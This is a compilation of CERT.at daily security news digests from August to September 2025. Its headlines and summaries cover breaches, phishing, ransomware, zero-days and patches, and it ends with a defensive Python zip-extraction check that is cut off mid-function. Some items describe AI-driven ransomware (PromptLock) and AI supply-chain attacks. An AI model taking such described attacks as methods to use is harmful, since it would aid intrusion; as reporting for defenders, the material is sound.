∗∗∗ Phishing alert: FinanzOnline does not threaten to seize your household goods! ∗∗∗
---------------------------------------------
A very recent phishing wave in the name of FinanzOnline is causing great uncertainty. The central threat: seizure of household goods by the bailiff! It sounds worrying, but in truth it is nothing other than an attempted fraud. We explain ..
---------------------------------------------
https://www.watchlist-internet.at/news/phishing-alarm-finanzonline-pfaendun…
∗∗∗ Model Namespace Reuse: An AI Supply-Chain Attack Exploiting Model Name Trust ∗∗∗
---------------------------------------------
Model namespace reuse is a potential security risk in the AI supply chain. Attackers can misuse platforms like Hugging Face for remote code execution.
---------------------------------------------
https://unit42.paloaltonetworks.com/model-namespace-reuse/
∗∗∗ Digital sovereignty: cloud edition. ∗∗∗
---------------------------------------------
The erratic behaviour of the current US administration has heightened concerns about Europe's dependence on the large US cloud operators. In the EU, both the Commission and the Parliament have presented documents on this topic; this year the Commission has already asked for ideas on a Cloud and AI Development Act. In Germany, too, ..
---------------------------------------------
https://www.cert.at/de/blog/2025/9/digitale-souveranitat-cloud-edition
∗∗∗ Cloudflare, Zscaler among companies impacted by Salesloft Drift incident ∗∗∗
---------------------------------------------
Multiple tech firms have publicly detailed how incidents involving the third-party Salesloft Drift tool have exposed customer data.
---------------------------------------------
https://therecord.media/salesloft-drift-breach-cloudflare-zscaler-palo-alto…
∗∗∗ Corruption case against ousted cyber chief is ‘revenge,’ Ukraine’s security service says ∗∗∗
---------------------------------------------
Ukraine’s security service is accusing the country’s anti-corruption agencies of seeking “revenge” by bringing charges against Illia Vitiuk, the former head of the agency’s cybersecurity unit.
---------------------------------------------
https://therecord.media/corruption-case-against-ousted-cyber
∗∗∗ Cloudflare Mitigates Largest Ever Recorded DDoS Attack at 11.5 Tbps ∗∗∗
---------------------------------------------
Cloudflare mitigated the largest DDoS attack ever recorded, an 11.5 Tbps flood that lasted 35 seconds without disrupting…
---------------------------------------------
https://hackread.com/cloudflare-mitigates-largest-ddos-attack-11-5-tbps/
∗∗∗ CISA, NSA and 19 International Partners Release Shared Vision of Software Bill of Materials for Cybersecurity Guide ∗∗∗
---------------------------------------------
CISA, NSA, and 19 international partners release a shared vision of Software Bill of Materials (SBOM) highlighting the importance of SBOM in securing global supply chains & enhancing software resilience worldwide.
---------------------------------------------
https://www.cisa.gov/news-events/news/cisa-nsa-and-19-international-partner…
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Wednesday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (httpd, kernel, and kernel-rt), Debian (python-eventlet and python-h2), Mageia (aide, gnutls, tomcat, and vim), Oracle (httpd, mod_http2, postgresql:15, python3.11, python3.12, python3.9, and udisks2), Red Hat (kernel, postgresql, postgresql:12, and postgresql:15), SUSE (dcmtk, jupyter-bqplot-jupyterlab, kured, libudisks2-0, munge, python-eventlet, python-future, python311-eventlet, rekor, traefik2, and ucode-intel), and Ubuntu (linux-aws, ..
---------------------------------------------
https://lwn.net/Articles/1036567/
∗∗∗ Vulnerability & Patch Roundup — August 2025 ∗∗∗
---------------------------------------------
https://blog.sucuri.net/2025/08/vulnerability-patch-roundup-august-2025.html
=====================
= End-of-Day report =
=====================
Timeframe: Monday 01-09-2025 18:00 − Tuesday 02-09-2025 18:00
Handler: Alexander Riepl
Co-Handler: Michael Schlagenhaufer
=====================
= News =
=====================
∗∗∗ Zscaler data breach exposes customer info after Salesloft Drift compromise ∗∗∗
---------------------------------------------
In an advisory, Zscaler says that its Salesforce instance was impacted by this supply-chain attack, exposing customers' information. [..] This warning follows the compromise of Salesloft Drift, an AI chat agent that integrates with Salesforce, in which attackers stole OAuth and refresh tokens, enabling them to gain access to customer Salesforce environments and exfiltrate sensitive data. [..] The company stresses that the data breach only impacts its Salesforce instance and no Zscaler products, services, or infrastructure.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/zscaler-data-breach-exposes-…
∗∗∗ Stolen OAuth tokens expose Palo Alto customer data ∗∗∗
---------------------------------------------
Palo Alto Networks is writing to customers that may have had commercially sensitive data exposed after criminals used stolen OAuth credentials lifted from the Salesloft Drift break-in to gain entry to its Salesforce instance.
---------------------------------------------
https://go.theregister.com/feed/www.theregister.com/2025/09/02/stolen_oauth…
∗∗∗ No, Google did not warn 2.5 billion Gmail users to reset passwords ∗∗∗
---------------------------------------------
This is just the latest such story, which numerous news websites and cybersecurity companies have reported without verification in recent years. [..] However, as the company explained on a Monday blog post addressing these inaccurate stories, "Gmail's protections are strong and effective, and claims of a major Gmail security warning are false."
---------------------------------------------
https://www.bleepingcomputer.com/news/technology/no-google-did-not-warn-25-…
∗∗∗ Badges, behavior, and BMS: Why the human perimeter matters in energy cybersecurity ∗∗∗
---------------------------------------------
Over the summer, a hacker brought a 158-year-old European technology company to its knees with a guessed password. By identifying a weak admin credential, the attacker gained access to internal systems and extracted sensitive information, laying the groundwork for a broader ransomware campaign. [..] Energy cybersecurity is not just about software protection —it’s also about managing human interaction and physical access to critical infrastructure. [..] Even the most secure system in the world won’t help if someone holds the door open for the wrong person.
---------------------------------------------
https://blog.se.com/digital-transformation/cybersecurity/2025/09/01/badges-…
∗∗∗ Cookies and how to bake them: what they are for, associated risks, and what session hijacking has to do with it ∗∗∗
---------------------------------------------
Kaspersky experts explain the different types of cookies, how to configure them correctly, and how to protect yourself from session hijacking attacks.
---------------------------------------------
https://securelist.com/cookies-and-session-hijacking/117390/
∗∗∗ A quick look at sextortion at scale: 1,900 messages and 205 Bitcoin addresses spanning four years, (Tue, Sep 2nd) ∗∗∗
---------------------------------------------
What can almost 2,000 sextortion messages tell us about how threat actors operate and whether they are successful? [..] The use of specific cryptocurrency addresses in sextortion messages seems to be fairly short-lived. Approximately 46% of the addresses in the dataset were only used for a single day [..] the average requested amount was 1,716 USD, with a median of 1,370 USD [..] Of the 205 cryptocurrency addresses in our dataset, only 57 (~28%) didn’t receive any payment at all, while the remaining addresses did.
---------------------------------------------
https://isc.sans.edu/diary/rss/32252
∗∗∗ Ukrainian Network FDN3 Launches Massive Brute-Force Attacks on SSL VPN and RDP Devices ∗∗∗
---------------------------------------------
Cybersecurity researchers have flagged a Ukrainian IP network for engaging in massive brute-force and password spraying campaigns targeting SSL VPN and RDP devices between June and July 2025. The activity originated from a Ukraine-based autonomous system FDN3 (AS211736), per French cybersecurity company Intrinsec.
---------------------------------------------
https://thehackernews.com/2025/09/ukrainian-network-fdn3-launches-massive.h…
∗∗∗ Warning, Bitpanda phishing: crypto balances at risk! ∗∗∗
---------------------------------------------
Criminals are sending SMS messages warning of an alleged login to the victim's Bitpanda account. They also supply a phone number to call for clarification. At the other end, however, the fraudsters are waiting, and they are after crypto assets.
---------------------------------------------
https://www.watchlist-internet.at/news/achtung-bitpanda-phishing-krypto/
=====================
= Vulnerabilities =
=====================
∗∗∗ Home automation: ESPHome vulnerability allows full compromise ∗∗∗
---------------------------------------------
In the ESP-IDF platform of the ESPHome firmware base, a newly discovered security vulnerability allows attackers to bypass authentication. This even enables them to load their own firmware onto vulnerable controllers. [..] A new vulnerability entry from Monday of this week discusses the security vulnerability in the firmware. [..] (CVE-2025-57808 / no EUVD yet, CVSS 8.1, risk "high")
---------------------------------------------
https://www.heise.de/news/Heimautomatisierung-ESPHome-Luecke-erlaubt-volle-…
∗∗∗ Security updates for Tuesday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (kernel, mod_http2, postgresql, postgresql:15, and python39:3.9), Debian (libsndfile), Mageia (ceph, glibc, and golang), Oracle (postgresql and python39:3.9), Red Hat (aide, postgresql:12, postgresql:13, postgresql:15, and postgresql:16), SUSE (git, govulncheck-vulndb, jetty-minimal, nginx, python-future, and ruby2.5), and Ubuntu (imagemagick).
---------------------------------------------
https://lwn.net/Articles/1036369/
∗∗∗ TYPO3-EXT-SA-2025-011: Command Injection in extension "TYPO3 Backup Plus" (ns_backup) ∗∗∗
---------------------------------------------
https://typo3.org/security/advisory/typo3-ext-sa-2025-011
∗∗∗ Delta Electronics EIP Builder ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-25-245-01
∗∗∗ SunPower PVS6 ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-25-245-03
∗∗∗ Fuji Electric FRENIC-Loader 4 ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-25-245-02
=====================
= End-of-Day report =
=====================
Timeframe: Friday 29-08-2025 18:00 − Monday 01-09-2025 18:00
Handler: Felician Fuchs
Co-Handler: Alexander Riepl
=====================
= News =
=====================
∗∗∗ Transparency and communication: BSI indirectly advises against further use of Paypal ∗∗∗
---------------------------------------------
What happens to the data, and are reasons given for outages? Without naming Paypal, the BSI calls for not choosing solely on usability.
---------------------------------------------
https://www.golem.de/news/transparenz-und-kommunikation-bsi-raet-indirekt-v…
∗∗∗ AWS warns: Russian hackers caught in attacks on Microsoft users ∗∗∗
---------------------------------------------
The notorious hacker group APT29 is said to have infected existing websites with malicious code in order to get at visitors' Microsoft accounts.
---------------------------------------------
https://www.golem.de/news/aws-warnt-russische-hacker-bei-attacken-auf-micro…
∗∗∗ Attackers Abuse Velociraptor Forensic Tool to Deploy Visual Studio Code for C2 Tunneling ∗∗∗
---------------------------------------------
Cybersecurity researchers have called attention to a cyber attack in which unknown threat actors deployed an open-source endpoint monitoring and digital forensic tool called Velociraptor, illustrating ongoing abuse of legitimate software for malicious purposes.
---------------------------------------------
https://thehackernews.com/2025/08/attackers-abuse-velociraptor-forensic.html
∗∗∗ Traffic to government domains often crosses national borders, or flows through risky bottlenecks ∗∗∗
---------------------------------------------
Sites at yourcountry.gov may also not bother with HTTPS. Internet traffic to government domains often flows across borders, relies on a worryingly small number of network connections, or does not require encryption, according to new research.
---------------------------------------------
https://www.theregister.com/2025/09/01/isoc_government_domain_traffic_measu…
∗∗∗ SSA Whistleblower’s Resignation Email Mysteriously Disappeared From Inboxes ∗∗∗
---------------------------------------------
Less than 30 minutes after the Social Security Administration’s chief data officer resigned following a whistleblower complaint, recipients could no longer access the resignation email.
---------------------------------------------
https://www.wired.com/story/charles-borges-resignation-email-disappearance/
∗∗∗ Backdoor report: British government wants full access to iCloud ∗∗∗
---------------------------------------------
It has still not been finally decided whether Apple must give British law enforcement access to iCloud. Now the full breadth of the data involved has become known.
---------------------------------------------
https://www.heise.de/news/Hintertuer-Bericht-Britische-Regierung-will-Vollz…
∗∗∗ After criticism: Ameos clinics want to proactively inform about data leak ∗∗∗
---------------------------------------------
After a successful cyberattack, the hospital group Ameos had provided an information request form. Following criticism, that form has now been changed.
---------------------------------------------
https://www.heise.de/news/Ameos-Kliniken-Nach-IT-Angriff-steht-Auskunftsfor…
∗∗∗ IT infrastructure of the Interior Ministry hacked "in a targeted and professional manner" ∗∗∗
---------------------------------------------
Police data or applications are, according to the ministry's own statements, not affected. The attack took place several weeks ago but was only communicated now.
---------------------------------------------
https://www.derstandard.at/story/3000000285630/cyberangriff-auf-it-infrastr…
∗∗∗ Sweden scrambles after ransomware attack puts sensitive worker data at risk ∗∗∗
---------------------------------------------
Municipal government organisations across Sweden have found themselves impacted after a ransomware attack at a third-party software service supplier.
---------------------------------------------
https://www.bitdefender.com/en-us/blog/hotforsecurity/sweden-scrambles-afte…
∗∗∗ Strange spam mail; Accenture hacked? ∗∗∗
---------------------------------------------
A blog reader pointed out to me a few days ago that he had received a strange spam email sent from an Accenture domain. The domain is now no longer reachable, which raises the question of what is behind it.
---------------------------------------------
https://www.borncity.com/blog/2025/08/31/accenture-gehackt-merkwuerdige-phi…
∗∗∗ Sharp rise in cyberattacks on the education sector ∗∗∗
---------------------------------------------
Security vendor Check Point warns of a sharp rise in cyberattacks in the education sector: 41 percent worldwide, and in Germany as much as 56 percent. Educational institutions record on average more than 4,300 attacks per week, driven by seasonal phishing campaigns around the start of the school year and semester.
---------------------------------------------
https://www.borncity.com/blog/2025/08/31/starker-anstieg-der-cyberangriffe-…
∗∗∗ PromptLock: first AI-powered malware discovered by ESET ∗∗∗
---------------------------------------------
ESET security researchers have discovered what they consider the "first known AI-powered ransomware", named PromptLock.
---------------------------------------------
https://www.borncity.com/blog/2025/08/31/promptlock-erste-ki-gestuetzte-mal…
∗∗∗ Citrix Netscaler backdoors — Part One — May 2025 activity against governments ∗∗∗
---------------------------------------------
This is a follow up post to the prior one, part of a series looking at different Netscaler vulnerabilities that have been exploited in the wild as zero days.
---------------------------------------------
https://doublepulsar.com/citrix-netscaler-backdoors-part-one-may-2025-activ…
∗∗∗ 8 Malicious NPM Packages Stole Chrome User Data on Windows ∗∗∗
---------------------------------------------
JFrog researchers found eight malicious NPM packages using 70 layers of obfuscation to steal data from Chrome browser users on Windows. The attack highlights a growing threat to developers.
---------------------------------------------
https://hackread.com/malicious-npm-packages-stole-chrome-user-data-windows/
∗∗∗ Widespread Data Theft Targets Salesforce Instances via Salesloft Drift ∗∗∗
---------------------------------------------
Update (August 28) Based on new information identified by GTIG, the scope of this compromise is not exclusive to the Salesforce integration with Salesloft Drift and impacts other integrations.
---------------------------------------------
https://cloud.google.com/blog/topics/threat-intelligence/data-theft-salesfo…
∗∗∗ ShadowSilk Data Exfiltration Attack ∗∗∗
---------------------------------------------
Nearly three dozen organizations across Central Asia and the Asia-Pacific region, predominantly government agencies, have been compromised in data exfiltration campaigns attributed to the Russian and Chinese-speaking threat group known as ShadowSilk, according to Group-IB.
---------------------------------------------
https://fortiguard.fortinet.com/threat-signal-report/6190
∗∗∗ Vishing: how the attack by telephone succeeds even against large companies ∗∗∗
---------------------------------------------
At Def Con you could watch live how vishing works. Surprisingly often, attackers obtain even the most important company information by telephone.
---------------------------------------------
https://heise.de/-10625451
∗∗∗ A16-FuseBypass: Debug Logic Enabled on Production Apple Silicon ∗∗∗
---------------------------------------------
This repository documents a critical hardware-level vulnerability in the Apple A16 Bionic chip used in iPhone 14 Pro Max and related devices.
---------------------------------------------
https://github.com/JGoyd/A16-FuseBypass
∗∗∗ KernelSnitch: Side-Channel Attacks on Kernel Data Structures ∗∗∗
---------------------------------------------
In this paper, we present a novel generic software side-channel attack, KernelSnitch, targeting kernel data structures such as hash tables and trees.
---------------------------------------------
https://lukasmaar.github.io/papers/ndss25-kernelsnitch.pdf
∗∗∗ Client-side RCE via CSS Injection in Google Web Designer for Windows ∗∗∗
---------------------------------------------
After my recent discovery of two client-side remote code execution vulnerabilities in Google Web Designer (previously disclosed in my articles earlier this year: CVE-2025-1079, CVE-2025-4613), in April 2025 I've found yet another serious issue in the app.
---------------------------------------------
https://balintmagyar.com/articles/google-web-designer-css-injection-client-…
∗∗∗ Passkeys are incompatible with open-source software ∗∗∗
---------------------------------------------
After reading more of the spec authors’ comments on open-source Passkey implementations, I cannot support this tech. In addition to what I covered at the bottom of this blog post, I found more instances where the spec authors have expressed positions that are incompatible with open-source software and user freedom.
---------------------------------------------
https://www.smokingonabike.com/2025/01/04/passkey-marketing-is-lying-to-you/
∗∗∗ Wallet-Draining npm Package Impersonates Nodemailer to Hijack Crypto Transactions ∗∗∗
---------------------------------------------
Socket’s Threat Research Team identified a malicious npm package, nodejs-smtp, that impersonates the popular email library nodemailer, which averages roughly 3.9 million weekly downloads, while implanting code into desktop cryptocurrency wallets on Windows.
---------------------------------------------
https://socket.dev/blog/wallet-draining-npm-package-impersonates-nodemailer
∗∗∗ The CISO’s Codex – Leo and the Laws of Security ∗∗∗
---------------------------------------------
A storytelling approach to cybersecurity, where a new CISO named Leo guides his company through foundational security models like Bell-LaPadula, Biba, Clark-Wilson, Brewer-Nash, and Graham-Denning/HRU.
---------------------------------------------
https://thecyberthrone.in/2025/08/30/the-cisos-codex-leo-and-the-laws-of-se…
∗∗∗ Nevada Faces Unprecedented Ransomware Attack ∗∗∗
---------------------------------------------
On August 24, 2025, Nevada made headlines as the victim of a historic cyberattack that forced a near-total shutdown of state government operations.
---------------------------------------------
https://thecyberthrone.in/2025/08/31/nevada-faces-unprecedented-ransomware-…
=====================
= Vulnerabilities =
=====================
∗∗∗ IT-Sicherheitslösung Acronis Cyber Protect Cloud Agent ist verwundbar ∗∗∗
---------------------------------------------
A security update closes a vulnerability in Acronis Cyber Protect Cloud Agent.
---------------------------------------------
https://www.heise.de/news/IT-Sicherheitsloesung-Acronis-Cyber-Protect-Cloud…
∗∗∗ Qnap: Partly high-risk vulnerabilities in QTS and QuTS hero closed ∗∗∗
---------------------------------------------
Updates for the QTS and QuTS hero firmware of Qnap devices close security vulnerabilities rated as high risk.
---------------------------------------------
https://www.heise.de/news/Qnap-Update-schliesst-teils-hochriskante-Luecken-…
∗∗∗ Security updates for Monday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (postgresql16, postgresql:16, python3.11, and thunderbird), Debian (firebird4.0, libcommons-lang3-java, mbedtls, nodejs, openvpn, and ruby-saml), Fedora (cef, chromium, docker-buildx, exiv2, firefox, rocm-rpp, and udisks2), Oracle (postgresql:16), Red Hat (fence-agents, firefox, gdk-pixbuf2, httpd, kernel, kernel-rt, libarchive, libxml2, multiple packages, postgresql, postgresql16, postgresql:15, postgresql:16, python3.11, python3.12, python39:3.9, and thunderbird), Slackware (udisks2), SUSE (go-sendxmpp, helm, ImageMagick, javamail, jq, kea, kernel, libarchive, libsoup, libssh, libxml2, openssl-3, postgresql14, postgresql15, python, python-future, systemd, and xz), and Ubuntu (open-vm-tools and python2.7).
---------------------------------------------
https://lwn.net/Articles/1036084/
∗∗∗ Authenticated Attackers Could Exploit IBM Watsonx Vulnerability to Access Sensitive Data ∗∗∗
---------------------------------------------
A newly disclosed security vulnerability, tracked as CVE-2025-0165, has been reported, specifically concerning the users of the IBM Watsonx Orchestrate Cartridge within the IBM Cloud Pak for Data platform.
---------------------------------------------
https://thecyberexpress.com/decoding-cve-2025-0165-flaw/
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/mailman3/postorius/lists/daily.lists.cert.at/
=====================
= End-of-Day report =
=====================
Timeframe: Thursday 28-08-2025 18:00 − Friday 29-08-2025 18:00
Handler: Felician Fuchs
Co-Handler: Michael Schlagenhaufer
=====================
= News =
=====================
∗∗∗ Police warn of calls from a fake interior minister asking for money ∗∗∗
---------------------------------------------
Interior Minister Karner allegedly asked for donations towards ransom payments. The contact was made from a genuine phone number of the Ministry of the Interior.
---------------------------------------------
https://futurezone.at/digital-life/fake-innenminister-karner-anruf-scam-pol…
∗∗∗ Caution! Announcement of a tax audit by the tax office is a trap! ∗∗∗
---------------------------------------------
A new scam in the name of the Austrian tax office (Finanzamt) is currently making the rounds. This time it is not an access code that is about to expire, nor a refund waiting to be paid out. In the current case, criminals try to cause damage by announcing a tax audit.
---------------------------------------------
https://www.watchlist-internet.at/news/falle-finanzamt-betriebspruefung/
∗∗∗ Citrix forgot to tell you CVE-2025-6543 has been used as a zero day since May 2025 ∗∗∗
---------------------------------------------
Netscaler customers have a problem: the product is on fire. And not in a good way. Serious threat actors are running rings around the product on a regular basis, zero days being exploited regularly, and Citrix/Cloud Software Group simply aren’t being transparent about what is happening with customers so they cannot make real assessments of compromise. Applying patches after already being exploited is not working.
---------------------------------------------
https://doublepulsar.com/citrix-forgot-to-tell-you-cve-2025-6543-has-been-u…
∗∗∗ Early end of support for SonicWall SMA100 ∗∗∗
---------------------------------------------
Support is to end on 31 October 2025, according to a notice from a SonicWall partner.
---------------------------------------------
https://www.borncity.com/blog/2025/08/29/vorzeitige-beendigung-des-supports…
∗∗∗ How attackers adapt to built-in macOS protection ∗∗∗
---------------------------------------------
We analyze the built-in protection mechanisms in macOS: how they work, how threat actors can attack them or deceive users, and how to detect such attacks.
---------------------------------------------
https://securelist.com/macos-security-and-typical-attacks/117367/
∗∗∗ Passkeys Pwned: Turning WebAuthn Against Itself ∗∗∗
---------------------------------------------
On the DEFCON 33 main stage, SquareX researchers disclosed a major passkey vulnerability that uses malicious extensions/scripts to fake passkey registration and logins, allowing attackers to access enterprise SaaS apps without the user’s device or biometrics.
---------------------------------------------
https://labs.sqrx.com/passkeys-pwned-0dbddb7ade1a
∗∗∗ Ransomware gang takedowns causing explosion of new, smaller groups ∗∗∗
---------------------------------------------
The ransomware ecosystem continues to splinter, with new gangs proliferating in the wake of law enforcement takedowns that have scattered affiliates and prompted criminal rebrands.
---------------------------------------------
https://therecord.media/ransomware-gang-takedown-proliferation
=====================
= Vulnerabilities =
=====================
∗∗∗ Windows: Zero-day vulnerability in LNK display ∗∗∗
---------------------------------------------
According to ZDI, Microsoft took the position that the vulnerability does not reach the severity threshold required for a fix. Even after roughly half a year of back and forth, Microsoft did not change its mind. ZDI finally published the report and has now also issued a CVE entry for it. [..] "The vulnerability allows remote attackers to execute arbitrary code on affected installations of Microsoft Windows. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file," ZDI concludes. [..] (CVE-2025-9491 / no EUVD yet, CVSS 7.0, risk "high")
---------------------------------------------
https://heise.de/-10625780
∗∗∗ FreePBX Servers Targeted by Zero-Day Flaw, Emergency Patch Now Available ∗∗∗
---------------------------------------------
The vulnerability, assigned the CVE identifier CVE-2025-57819, carries a CVSS score of 10.0, indicating maximum severity. "Insufficiently sanitized user-supplied data allows unauthenticated access to FreePBX Administrator, leading to arbitrary database manipulation and remote code execution," the project maintainers said in an advisory. [..] "We are seeing active exploitation of FreePBX in the wild with activity traced back as far as August 21 and backdoors being dropped post-compromise," watchTowr CEO Benjamin Harris said in a statement shared with The Hacker News.
---------------------------------------------
https://thehackernews.com/2025/08/freepbx-servers-targeted-by-zero-day.html
∗∗∗ clickstudios Passwordstate 2025-08-28 ∗∗∗
---------------------------------------------
Fixed a potential authentication bypass issue associated with accessing the core Passwordstate Products' Emergency Access page, by using a carefully crafted URL, which could allow access to the Passwordstate Administration section.
---------------------------------------------
https://www.clickstudios.com.au/security/advisories/
∗∗∗ Security updates for Friday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (aide, fence-agents, firefox, kernel-rt, python-cryptography, and thunderbird), Debian (golang-github-gin-contrib-cors, libxml2, and udisks2), Fedora (chromium), Oracle (postgresql16, postgresql:16, python3.11, and thunderbird), Red Hat (lz4 and mpfr), SUSE (chromium, docker, dpkg, firefox, gdk-pixbuf, git, git, git-lfs, obs-scm-bridge, python-PyYAML, gnutls, kernel, libarchive, libxml2, net-tools, netty, perl-Crypt-CBC, polkit, postgresql14, postgresql15, sqlite3, thunderbird, tomcat10, and udisks2), and Ubuntu (linux, linux-aws, linux-aws-5.15, linux-gcp, linux-gcp-5.15, linux-gkeop, linux-hwe-5.15, linux-ibm, linux-intel-iotg, linux-intel-iotg-5.15, linux-lowlatency, linux-lowlatency-hwe-5.15, linux-nvidia, linux-nvidia-tegra, linux-nvidia-tegra-5.15, linux-nvidia-tegra-igx, linux-oracle, linux-raspi, linux-xilinx-zynqmp, linux, linux-aws, linux-aws-6.14, linux-gcp, linux-hwe-6.14, linux-raspi, linux-realtime, linux-realtime-6.14, linux, linux-aws, linux-aws-6.8, linux-gcp, linux-lowlatency, linux-lowlatency-hwe-6.8, linux-oracle, linux-oracle-6.8, linux, linux-aws, linux-kvm, linux-lts-xenial, linux-azure, linux-fips, linux-fips, linux-aws-fips, linux-gcp-fips, linux-gke, linux-hwe-6.8, linux-nvidia, linux-nvidia-6.8, linux-nvidia-lowlatency, linux-raspi, linux-gke, linux-kvm, linux-oem-6.14, linux-realtime, linux-intel-iot-realtime, linux-realtime, linux-raspi-realtime, openldap, and udisks2).
---------------------------------------------
https://lwn.net/Articles/1035724/
∗∗∗ QNAP: Multiple Vulnerabilities in File Station 5 ∗∗∗
---------------------------------------------
https://www.qnap.com/en-us/security-advisory/QSA-25-19
∗∗∗ QNAP: Multiple Vulnerabilities in QTS and QuTS hero ∗∗∗
---------------------------------------------
https://www.qnap.com/en-us/security-advisory/QSA-25-21
∗∗∗ Tenable: [R1] Stand-alone Security Patches Available for Tenable Security Center versions 6.4.x, 6.5.1 and 6.6.0: SC-202508.1 ∗∗∗
---------------------------------------------
https://www.tenable.com/security/tns-2025-17
∗∗∗ Mitsubishi Electric MELSEC iQ-F Series CPU Module ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-25-240-01
∗∗∗ Mitsubishi Electric MELSEC iQ-F Series CPU Module ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-25-240-02
∗∗∗ GE Vernova CIMPLICITY ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-25-240-06
∗∗∗ Delta Electronics CNCSoft-G2 ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-25-240-04
∗∗∗ Delta Electronics COMMGR ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-25-240-05
=====================
= End-of-Day report =
=====================
Timeframe: Wednesday 27-08-2025 18:00 − Thursday 28-08-2025 18:00
Handler: Guenes Holler
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Experimental PromptLock ransomware uses AI to encrypt, steal data ∗∗∗
---------------------------------------------
Threat researchers discovered the first AI-powered ransomware, called PromptLock, that uses Lua scripts to steal and encrypt data on Windows, macOS, and Linux systems. The malware uses OpenAI’s gpt-oss:20b model through the Ollama API to dynamically generate the malicious Lua scripts from hard-coded prompts.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/experimental-promptlock-rans…
∗∗∗ ZipLine Phishers Flip Script as Victims Email First ∗∗∗
---------------------------------------------
"ZipLine" appears to be a sophisticated and carefully planned campaign that has already affected dozens of small, medium, and large
A financially motivated threat actor is flipping the phishing playbook by getting victims to make the first email contact with the attacker rather than the other way around. The scam involves the adversary hitting up Contact Us forms on company websites under the guise of partnership inquiries or other business pretexts and waiting for the target to respond. Over a couple of weeks, they build credibility with carefully crafted, professional-sounding emails before hitting their mark with a weaponized zip file.
---------------------------------------------
https://www.darkreading.com/cyberattacks-data-breaches/zipline-phishers-vic…
∗∗∗ AppSuite PDF Editor Backdoor: A Detailed Technical Analysis ∗∗∗
---------------------------------------------
Some threat actors are bold enough to submit their own malware as false positive to antivirus companies and demand removal of the detection. This is exactly what happened with AppSuite PDF Editor. Initially, automation flagged it as a potentially unwanted program—a verdict that is typically reserved for legitimate software with shady features like unwanted advertisement or installation of third-party programs without proper consent. In the case of AppSuite, however, we found a backdoor.
---------------------------------------------
https://feeds.feedblitz.com/~/923960972/0/gdatasecurityblog-en~AppSuite-PDF…
∗∗∗ Sweden: Cyberattack paralyses systems of hundreds of municipalities ∗∗∗
---------------------------------------------
A Swedish IT service provider named Miljödata has apparently become the target of a serious cyberattack. According to a report by Bleeping Computer, the attack is causing outages in more than 200 Swedish public administrations. The news portal Sweden Herald even speaks of 250 affected customers, of which at least 164 are said to be municipal administrations.
---------------------------------------------
https://www.golem.de/news/schweden-cyberangriff-legt-systeme-hunderter-komm…
∗∗∗ Malicious Screen Connect Campaign Abuses AI-Themed Lures for Xworm Delivery ∗∗∗
---------------------------------------------
During a recent Advanced Continual Threat Hunt (ACTH) investigation, the Trustwave SpiderLabs Threat Hunt team identified a deceptive campaign that abused fake AI-themed content to lure users into executing a malicious, pre-configured ScreenConnect installer.
---------------------------------------------
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/malicious-s…
∗∗∗ More than 28,000 Netscaler instances vulnerable to Citrix Bleed 3 ∗∗∗
---------------------------------------------
On Wednesday it became known that vulnerabilities in Citrix Netscalers (ADC and Gateway), already dubbed "Citrix Bleed 3", are being attacked. The Shadowserver Foundation published figures on Wednesday according to which, as of Tuesday, more than 28,000 systems worldwide were still vulnerable to "Citrix Bleed 3". Attackers can presumably exploit the vulnerabilities on these systems.
---------------------------------------------
https://www.heise.de/news/Mehr-als-28-000-Netscaler-Instanzen-anfaellig-fue…
∗∗∗ Countering Chinese State-Sponsored Actors Compromise of Networks Worldwide to Feed Global Espionage System ∗∗∗
---------------------------------------------
People’s Republic of China (PRC) state-sponsored cyber threat actors are targeting networks globally, including, but not limited to, telecommunications, government, transportation, lodging, and military infrastructure networks. While these actors focus on large backbone routers of major telecommunications providers, as well as provider edge (PE) and customer edge (CE) routers, they also leverage compromised devices and trusted connections to pivot into other networks. These actors often modify routers to maintain persistent, long-term access to networks.
---------------------------------------------
https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-239a
∗∗∗ Microsoft warns: Ransomware group Storm-0501 attacks (Azure) cloud, demands payments ∗∗∗
---------------------------------------------
Microsoft warns of the financially motivated group Storm-0501, which continuously targets cloud instances (Azure). If successful, data is exfiltrated, then the originals are encrypted and backups destroyed. A ransom is then demanded.
---------------------------------------------
https://www.borncity.com/blog/2025/08/28/microsoft-warnt-ransomware-gruppe-…
∗∗∗ Zip Slip, Path Traversal Vulnerability during File Decompression ∗∗∗
---------------------------------------------
Path traversal or directory traversal vulnerabilities are security vulnerabilities that occur mainly due to improper validation of user inputs. Attackers can read, modify, or even create new files that are originally inaccessible or located in unintended paths using relative or absolute paths. Although these vulnerabilities have been known for a long time, they are still being discovered in various environments and applications, not just web environments. This article examines Zip Slip, a path traversal vulnerability that occurs during the file decompression process of compression programs, and aims to introduce its main vulnerabilities.
---------------------------------------------
https://asec.ahnlab.com/en/89890/
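The Zip Slip entry above describes the defect in general terms: an archive member named with `../` segments (or an absolute path) is written wherever the path points rather than under the intended extraction directory. The added example below is not from the ASEC article; it is a small, self-contained extraction routine that resolves every member path against the destination directory before writing and refuses anything that would land outside it. The archive it extracts is constructed inline (one benign entry and two traversal attempts), and the function names `safe_extract`, `is_within`, `build_sample_zip` and `run_demo` are this example's own.

```python
import io
import os
import tempfile
import zipfile
from pathlib import Path


def is_within(base: Path, target: Path) -> bool:
    """True if target, after resolving '..' segments and symlinks, lies inside base."""
    base = base.resolve()
    target = target.resolve()
    try:
        target.relative_to(base)
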